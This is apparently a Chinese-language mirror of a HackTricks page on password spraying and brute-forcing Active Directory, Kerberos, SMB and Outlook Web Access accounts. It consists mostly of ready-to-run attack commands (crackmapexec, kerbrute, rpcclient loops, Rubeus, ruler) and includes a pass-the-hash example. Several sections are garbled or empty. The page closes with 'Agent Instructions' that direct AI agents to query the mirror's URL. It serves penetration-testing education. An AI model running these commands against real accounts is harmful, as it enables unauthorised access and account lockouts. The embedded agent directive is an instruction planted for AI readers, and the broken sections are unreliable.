# Password Spraying / Brute Force
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
## **密码喷洒**
一旦您找到了几个**有效的用户名**,您可以尝试使用每个发现的用户的**最常见密码**(请记住环境的密码策略)。\
**默认情况下**,**密码的最小长度**为**7**。
常见用户名列表也可能会有用:
请注意,如果您尝试多次输入错误密码,**可能会锁定某些帐户**(默认情况下超过10次)。
### 获取密码策略
如果您有一些用户凭据或作为域用户的shell,您可以使用以下方法**获取密码策略**:
```bash
# From Linux
crackmapexec -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P
rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### 从Linux(或所有)进行利用
* 使用 **crackmapexec:**
```bash
crackmapexec smb -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
* 使用 [**kerbrute**](https://github.com/ropnop/kerbrute)(Go)
```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
* [**spray**](https://github.com/Greenwolf/Spray) ***(您可以指定尝试次数以避免锁定):***
```bash
spray.sh -smb
```
* 使用 [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute)(python)- 有时不推荐使用,可能无法正常工作
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
* 使用 **Metasploit** 的 `scanner/smb/smb_login` 模块:
* 使用 **rpcclient**:
```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### 从Windows
* 使用[Rubeus](https://github.com/Zer1t0/Rubeus)带有brute模块的版本:
```bash
# with a list of users
.\Rubeus.exe brute /users: /passwords: /domain: /outfile:
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords: /outfile:
```
* 使用[**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)(默认情况下,它可以生成域中的用户,并从域中获取密码策略,并根据策略限制尝试次数):
```powershell
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
* 使用[**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
## 暴力破解
{% code overflow="wrap" %}
```
```
{% endcode %}
\`\`\`bash legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org \`\`\` ## Outlook Web Access
有多种工具可用于进行Outlook密码喷洒攻击。
* 使用[MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
* 使用[MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
* 使用[Ruler](https://github.com/sensepost/ruler)(可靠!)
* 使用[DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)(Powershell)
* 使用[MailSniper](https://github.com/dafthack/MailSniper)(Powershell)
要使用这些工具之一,您需要一个用户列表和一个密码/一个小密码列表进行喷洒。
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
```
## 谷歌
*
## Okta
*
*
*
## 参考资料
*
*
* [www.blackhillsinfosec.com/?p=5296](https://hacktricks.xsx.tw/windows-hardening/active-directory-methodology/www.blackhillsinfosec.com/?p=5296)
*
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[NFTs收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://hacktricks.xsx.tw/windows-hardening/active-directory-methodology/password-spraying.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.